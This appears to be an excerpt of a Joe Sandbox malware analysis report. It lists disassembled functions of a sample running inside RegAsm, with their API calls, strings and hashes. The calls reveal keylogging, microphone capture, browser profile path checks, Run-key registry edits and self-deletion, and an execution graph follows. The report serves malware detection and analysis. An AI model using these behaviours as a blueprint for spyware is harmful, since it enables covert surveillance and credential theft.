                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                • String ID: Online Keylogger Stopped
                                                                • API String ID: 1623830855-1496645233
                                                                • Opcode ID: 58fc78273637d3a7085363245c614971f3a5c921d027ed369f39b2d39b95462a
                                                                • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                                                • Opcode Fuzzy Hash: 58fc78273637d3a7085363245c614971f3a5c921d027ed369f39b2d39b95462a
                                                                • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                                                Function 10001EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                  • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                • String ID: Unknown exception
                                                                • API String ID: 3476068407-410509341
                                                                • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                                                Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • waveInPrepareHeader.WINMM(013D07B0,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                                                • waveInAddBuffer.WINMM(013D07B0,00000020,?,00000000,00401A15), ref: 0040185F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: wave$BufferHeaderPrepare
                                                                • String ID: XMG
                                                                • API String ID: 2315374483-813777761
                                                                • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                                • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                                Function 00448B66 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LocaleValid
                                                                • String ID: IsValidLocaleName$kKD
                                                                • API String ID: 1901932003-3269126172
                                                                • Opcode ID: e2be842f2307acef5cef967ff3e72c46beaafbec9f28b2cc6d0622aebebc3446
                                                                • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                                                • Opcode Fuzzy Hash: e2be842f2307acef5cef967ff3e72c46beaafbec9f28b2cc6d0622aebebc3446
                                                                • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                                                Function 0040C4FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExistsFilePath
                                                                • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                • API String ID: 1174141254-4188645398
                                                                • Opcode ID: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                                                • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                                                • Opcode Fuzzy Hash: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                                                • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                                                Function 0040C561 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExistsFilePath
                                                                • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                • API String ID: 1174141254-2800177040
                                                                • Opcode ID: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                                                • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                                                • Opcode Fuzzy Hash: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                                                • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                                                Function 0040C5C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5F7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExistsFilePath
                                                                • String ID: AppData$\Opera Software\Opera Stable\
                                                                • API String ID: 1174141254-1629609700
                                                                • Opcode ID: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                                                • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                                                • Opcode Fuzzy Hash: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                                                • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                                                Function 0040B681 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetKeyState.USER32(00000011), ref: 0040B686
                                                                  • Part of subcall function 0040A41B: GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A451
                                                                  • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                                  • Part of subcall function 0040A41B: GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                                  • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                                  • Part of subcall function 0040A41B: GetKeyboardState.USER32(?,?,004750F0), ref: 0040A479
                                                                  • Part of subcall function 0040A41B: ToUnicodeEx.USER32(00475144,00000000,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                                  • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                                  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                • String ID: [AltL]$[AltR]
                                                                • API String ID: 2738857842-2658077756
                                                                • Opcode ID: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                                • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                                                • Opcode Fuzzy Hash: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                                • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                                                Function 004161C5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExecuteShell
                                                                • String ID: !D@$open
                                                                • API String ID: 587946157-1586967515
                                                                • Opcode ID: 4c61eaa6548ee28cdb1e2a4907ffc3a5f6acbad4bc53697dcaba2df13cd2f041
                                                                • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                                                • Opcode Fuzzy Hash: 4c61eaa6548ee28cdb1e2a4907ffc3a5f6acbad4bc53697dcaba2df13cd2f041
                                                                • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                                                Function 0040B6DB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: State
                                                                • String ID: [CtrlL]$[CtrlR]
                                                                • API String ID: 1649606143-2446555240
                                                                • Opcode ID: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                                • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                                                • Opcode Fuzzy Hash: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                                • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                                                Function 0040E7DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Init_thread_footer__onexit
                                                                • String ID: ,kG$0kG
                                                                • API String ID: 1881088180-2015055088
                                                                • Opcode ID: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                                • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                                                                • Opcode Fuzzy Hash: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                                • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
                                                                Function 00413A5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D17F,00000000,004752D8,004752F0,?,pth_unenc), ref: 00413A6C
                                                                • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00413A80
                                                                Strings
                                                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DeleteOpenValue
                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                • API String ID: 2654517830-1051519024
                                                                • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                                                • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                                                Function 0040B8A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                                                                • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DeleteDirectoryFileRemove
                                                                • String ID: pth_unenc
                                                                • API String ID: 3325800564-4028850238
                                                                • Opcode ID: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                • Instruction ID: ee660421d7ec44f6c6eaad5e9e1fc6482a22fb53094cf60c5c3e5a772ac54322
                                                                • Opcode Fuzzy Hash: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                • Instruction Fuzzy Hash: 5AE04F314006109BC610BB218854AD6335CAB04316F00497BE4A3A35A1DF38AC49D658
                                                                Function 0041288B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ObjectProcessSingleTerminateWait
                                                                • String ID: pth_unenc
                                                                • API String ID: 1872346434-4028850238
                                                                • Opcode ID: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                                • Instruction ID: 30425768eaae71e8f6d4d073063fb5581f05561c6d480f36d281b696a9d2b878
                                                                • Opcode Fuzzy Hash: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                                • Instruction Fuzzy Hash: DBD01234149312FFD7310F60EE4DB443B589705362F140361F439552F1C7A589D4AB58
                                                                Function 00440CE1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                                                • GetLastError.KERNEL32 ref: 00440D85
                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                • String ID:
                                                                • API String ID: 1717984340-0
                                                                • Opcode ID: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                                                • Opcode Fuzzy Hash: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                                                Function 00411B9A Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                                                • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                                                • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
                                                                • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLastRead
                                                                • String ID:
                                                                • API String ID: 4100373531-0
                                                                • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                                                • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99

                                                                Execution Graph

                                                                Execution Coverage:6.4%
                                                                Dynamic/Decrypted Code Coverage:9.2%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:2000
                                                                Total number of Limit Nodes:81
                                                                execution_graph 40409 441819 40412 430737 40409->40412 40411 441825 40413 430756 40412->40413 40424 43076d 40412->40424 40414 430774 40413->40414 40415 43075f 40413->40415 40427 43034a memcpy 40414->40427 40426 4169a7 11 API calls 40415->40426 40418 4307ce 40420 430819 memset 40418->40420 40428 415b2c 11 API calls 40418->40428 40419 43077e 40419->40418 40423 4307fa 40419->40423 40419->40424 40420->40424 40422 4307e9 40422->40420 40422->40424 40429 4169a7 11 API calls 40423->40429 40424->40411 40426->40424 40427->40419 40428->40422 40429->40424 37678 442ec6 19 API calls 37855 4152c6 malloc 37856 4152e2 37855->37856 37857 4152ef 37855->37857 37859 416760 11 API calls 37857->37859 37859->37856 37860 4466f4 37879 446904 37860->37879 37862 446700 GetModuleHandleA 37865 446710 __set_app_type __p__fmode __p__commode 37862->37865 37864 4467a4 37866 4467ac __setusermatherr 37864->37866 37867 4467b8 37864->37867 37865->37864 37866->37867 37880 4468f0 _controlfp 37867->37880 37869 4467bd _initterm __wgetmainargs _initterm 37870 44681e GetStartupInfoW 37869->37870 37871 446810 37869->37871 37873 446866 GetModuleHandleA 37870->37873 37881 41276d 37873->37881 37877 446896 exit 37878 44689d _cexit 37877->37878 37878->37871 37879->37862 37880->37869 37882 41277d 37881->37882 37924 4044a4 LoadLibraryW 37882->37924 37884 412785 37916 412789 37884->37916 37932 414b81 37884->37932 37887 4127c8 37938 412465 memset ??2@YAPAXI 37887->37938 37889 4127ea 37950 40ac21 37889->37950 37894 412813 37968 40dd07 memset 37894->37968 37895 412827 37973 40db69 memset 37895->37973 37898 412822 37994 4125b6 ??3@YAXPAX 37898->37994 37900 40ada2 _wcsicmp 37901 41283d 37900->37901 37901->37898 37904 412863 CoInitialize 37901->37904 37978 41268e 37901->37978 37998 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37904->37998 37908 41296f 38000 40b633 37908->38000 37910 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37915 412957 CoUninitialize 37910->37915 37921 4128ca 37910->37921 37915->37898 37916->37877 37916->37878 37917 4128d0 TranslateAcceleratorW 37918 412941 GetMessageW 37917->37918 37917->37921 37918->37915 37918->37917 37919 412909 IsDialogMessageW 37919->37918 37919->37921 37920 4128fd IsDialogMessageW 37920->37918 37920->37919 37921->37917 37921->37919 37921->37920 37922 41292b TranslateMessage DispatchMessageW 37921->37922 37923 41291f IsDialogMessageW 37921->37923 37922->37918 37923->37918 37923->37922 37925 4044cf GetProcAddress 37924->37925 37928 4044f7 37924->37928 37926 4044e8 FreeLibrary 37925->37926 37929 4044df 37925->37929 37927 4044f3 37926->37927 37926->37928 37927->37928 37930 404507 MessageBoxW 37928->37930 37931 40451e 37928->37931 37929->37926 37930->37884 37931->37884 37933 414b8a 37932->37933 37934 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37932->37934 38004 40a804 memset 37933->38004 37934->37887 37937 414b9e GetProcAddress 37937->37934 37940 4124e0 37938->37940 37939 412505 ??2@YAPAXI 37941 41251c 37939->37941 37944 412521 37939->37944 37940->37939 38026 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37941->38026 38015 444722 37944->38015 37949 41259b wcscpy 37949->37889 38031 40b1ab free free 37950->38031 37952 40ad76 38032 40aa04 37952->38032 37955 40a9ce malloc memcpy free free 37957 40ac5c 37955->37957 37956 40ad4b 37956->37952 38055 40a9ce 37956->38055 37957->37952 37957->37955 37957->37956 37958 40ace7 free 37957->37958 38035 40a8d0 37957->38035 38047 4099f4 37957->38047 37958->37957 37963 40a8d0 7 API calls 37963->37952 37964 40ada2 37965 40adc9 37964->37965 37967 40adaa 37964->37967 37965->37894 37965->37895 37966 40adb3 _wcsicmp 37966->37965 37966->37967 37967->37965 37967->37966 38060 40dce0 37968->38060 37970 40dd3a GetModuleHandleW 38065 40dba7 37970->38065 37974 40dce0 3 API calls 37973->37974 37975 40db99 37974->37975 38137 40dae1 37975->38137 38151 402f3a 37978->38151 37980 412766 37980->37898 37980->37904 37981 4126d3 _wcsicmp 37982 4126a8 37981->37982 37982->37980 37982->37981 37984 41270a 37982->37984 38185 4125f8 7 API calls 37982->38185 37984->37980 38154 411ac5 37984->38154 37995 4125da 37994->37995 37996 4125f0 37995->37996 37997 4125e6 DeleteObject 37995->37997 37999 40b1ab free free 37996->37999 37997->37996 37998->37910 37999->37908 38001 40b640 38000->38001 38002 40b639 free 38000->38002 38003 40b1ab free free 38001->38003 38002->38001 38003->37916 38005 40a83b GetSystemDirectoryW 38004->38005 38006 40a84c wcscpy 38004->38006 38005->38006 38011 409719 wcslen 38006->38011 38009 40a881 LoadLibraryW 38010 40a886 38009->38010 38010->37934 38010->37937 38012 409724 38011->38012 38013 409739 wcscat LoadLibraryW 38011->38013 38012->38013 38014 40972c wcscat 38012->38014 38013->38009 38013->38010 38014->38013 38016 444732 38015->38016 38017 444728 DeleteObject 38015->38017 38027 409cc3 38016->38027 38017->38016 38019 412551 38020 4010f9 38019->38020 38021 401130 38020->38021 38022 401134 GetModuleHandleW LoadIconW 38021->38022 38023 401107 wcsncat 38021->38023 38024 40a7be 38022->38024 38023->38021 38025 40a7d2 38024->38025 38025->37949 38025->38025 38026->37944 38030 409bfd memset wcscpy 38027->38030 38029 409cdb CreateFontIndirectW 38029->38019 38030->38029 38031->37957 38033 40aa14 38032->38033 38034 40aa0a free 38032->38034 38033->37964 38034->38033 38036 40a8eb 38035->38036 38037 40a8df wcslen 38035->38037 38038 40a906 free 38036->38038 38039 40a90f 38036->38039 38037->38036 38040 40a919 38038->38040 38041 4099f4 3 API calls 38039->38041 38042 40a932 38040->38042 38043 40a929 free 38040->38043 38041->38040 38045 4099f4 3 API calls 38042->38045 38044 40a93e memcpy 